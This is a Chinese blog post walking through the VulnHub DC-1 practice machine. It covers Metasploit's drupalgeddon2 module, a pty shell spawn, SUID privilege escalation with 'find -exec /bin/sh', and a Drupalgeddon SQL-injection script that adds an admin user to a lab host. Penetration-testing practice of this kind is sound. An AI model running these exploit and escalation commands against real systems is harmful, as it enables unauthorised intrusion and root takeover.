VulnHub — DC-1

最新推荐文章于 2024-06-13 23:52:14 发布
最新推荐文章于 2024-06-13 23:52:14 发布
阅读量400 收藏
点赞数
分类专栏: 渗透 文章标签: 服务器 运维 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/126592186
版权

信息收集

 

主机发现

 不清楚什么原因,这个靶机的ip一直扫不到 偶尔又扫到了,不知道什么问题

既然扫到了, 就不管了,80端口开了 

信息收集

直接访问网站扫目录

 Drupal 是使用PHP语言编写的开源内容管理框架(CMF),由内容管理系统(CMS)和PHP开发框架共同构成。 形象的说Drupal是一个福袋CMS的PHP开发框架

msf漏洞发现

1启动:msfconsole

2搜索利用脚本:search Drupal

3进入利用脚本:use

4查看需要参数:show opitons

5设置参数:set

6执行攻击:run

msf启动 然后search一下 找exp 

不少东西,其实可以试试用哪个,这里就直接用drupal_drupalgeddon2 也就是序号4

看options 只需要配置RHOSTS 也就是靶机地址

payload也已经配置好了

session 传入 直接进入shell

查看权限www-data 进入交互式

python -c 'import pty;pty.spawn("/bin/bash")'

SUID提权(find)


Set User ID是一种权限类型,允许用户使用指定用户的权限执行文件。那些具有suid权限的文件以最高的权限运行。假设我们以非root用户身份访问目标系统,井且我们发现二进制文件启用了suid位,那么这些文件/程序/命令可以root权限运行. SUID的目的就是:让本来没有相应权限的用户运行这个程序时,可以访问他没有权限访问的资源。
 

1、查看具有SUID的二进制可执行文件 
find / -user root -perm -4000 -print 2>/dev/null

2、一直可用来提权的linux可行性的文件列表如下:
Nmap 、 Vim 、 find 、 Bash 、 More 、 Less 、Nano 、 cp

3、利用find获得root权限shell 
find / -name cron.php -exec "/bin/sh" \;

寻找可利用的文件,find 可以

如何利用find来进行SUID提权 

find / -name cron.php -exec "/bin/sh" \;

前半段是为了能顺利执行find 命令, 后面就是提权利用了 

拿到root 去find flag

find / -name "*flag*.txt"

Drupal 攻击脚本的利用 

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) - PHP webapps Exploit

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)

这个版本范围存在的漏洞,脚本下载即可 在kali机上直接打

设置用户名密码 123456 

python2 34992.py -t http://192.168.164.136 -u 123456 -p 123456

 攻击成功生成 url ,直接去登录即可 ,就是管理员后台了 

ThnPkm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
VulnHub DC-1
weixin_45682839的博客
04-13 320
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶场练习第九天~vulnhub靶场之dc-1
qq_57976347的博客
02-03 914
一、环境搭建 靶场下载链接: 百度网盘 请输入提取码 提取码: ih67 1.查看kali的ip:ifconfig 二、信息收集 1.使用namp命令 主机探测: nmap -sP 192.168.101.0/24 正在上传…重新上传取消 查看靶机开放端口号和服务:nmap -A 192.168.101.111 发现开放80端口,访问一下192.168.101.111 Drupal简介: Drupal是开源CMS之一,Drupal是CMS内容管理系统,并且在世界各地使用,受到
vulnhub DC-1
小白一枚多多关注的博客
01-30 272
vulnhub DC-1(两种不同的攻击手法)
VulnHub DC-1 Writeup
末初的CSDN博客
09-28 406
DC-1详情见:https://www.vulnhub.com/entry/dc-1,292/ 靶机环境VirtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.102 攻击机环境VMware,桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177 Nmap扫描C段内存活主机 nmap -sP 192.168.56.1/24 如果觉得速度慢了的话可以使用 arp-scan -l 发现目标靶机IP:192.1
Vulnhub DC-5
Pai_Space
02-20 266
Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with.
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2436
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Vulnhub DC-1
Pai_Space
01-23 365
DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ab.
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2239
vulnhub DC-4靶机实战
Vulnhub DC-8
Pai_Space
04-05 989
明确:《中华人民共和国网络安全法》 Description DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of conce..
Vulnhub DC-6
Pai_Space
03-11 765
Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn't an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to g.
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Nginx之静态文件服务器的搭建
wyx的博客
06-13 699
静态文件服务器是指提供HTML文件访问或客户端 可直接从中下载文件的Web服务器。对于图片、 JavaScript或CSS文件等渲染页面外观的、不会动态改 变内容的文件,大多数网站会单独提供以静态文件服 务器的方式对其进行访问,实现动静分离的架构。在以上配置中,每个server指令域等同于一个虚 拟服务器,每个location指令域等同于一个虚拟目录。
百度网盘限速解决办法
最新发布
生活在别处
06-13 468
比如可以获取下载直链后,使用IDM(Internet Download Manager)对该直链进行多线程下载,但是并不会有实际速率提升效果,因为百度网盘在服务器端进行了限速,多线程的速率总和被限制在了100KB/s左右。(现在虽然是所谓玩游戏获得会员下载体验,实际上点击后会在百度网盘内打开一个web游戏,并不需要游玩游戏,直接等待会员下载体验时间结束即可关闭web游戏窗口)所以,客户端这些改动伎俩通通没有实际效果,即使在客户端显示无限速、显示会员体验,都只是自欺欺人而已。
多进程并发服务器
dc爱傲雪和技术
06-12 152
3.子进程:完成通信,接受一个客户端连接,就创建一个子进程用于通信。要实现TCP通信服务器处理并发的任务,使用多线程或者多进程来解决。2.父进程负责等待并接受客户端的连接。
Joplin Typora 粘贴图片 | 当使用Typora作为Joplin编辑器时,如何粘贴图片并上传到Joplin服务器,替换链接
瑞哥的博客
06-12 535
然而Typora中上传的图片只能在本地,无法上传到Joplin服务器,在其他客户端也看不到图片。本文编写了一个脚本,通过Typora的上传服务器功能,自动上传图片并替换为Joplin链接。在编辑器内粘贴图片,按下ctrl+s 保存,等待几秒后自动替换为内部连接,大公告成。当我们使用Joplin时,上传图片时会自动上传到Joplin服务器并替换链接。选择图象,上传服务,命令,确保你的python环境和模块正确。如果遇到问题,可以手动点击上传图片,检查顶部报错。token可以在网页剪藏器中获取。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值